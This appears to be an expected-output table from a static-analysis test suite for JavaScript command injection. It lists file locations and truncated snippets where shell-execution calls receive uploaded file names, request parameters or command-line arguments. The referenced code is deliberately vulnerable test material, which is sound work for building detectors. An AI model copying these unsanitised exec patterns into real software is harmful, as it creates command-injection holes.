| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:1:16:2 | app.pos ... })\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:12:28:12:53 | upload. ... s', 12) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | require('busboy') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | http.cr ... oy);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | http.cr ... n(8000) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | require ... dable') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | app.pos ... });\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:40:3:42:4 | form2.p ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | require ... party') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | http.cr ... q);\\n\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | http.cr ... n(8080) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | require("http") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | require("url") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | http.cr ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | require("https") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | https.g ... })\\n) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | require ... -args") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | require("minimist") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | require ... ist")() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | cp.exec ... gv.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | require("yargs") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | cp.exec ... gv.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | require("optimist") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | require("express") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | express() |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | app.get ... / OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | app.lis ... 000!")) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | require('path') |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | require("./lib2.js") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) |
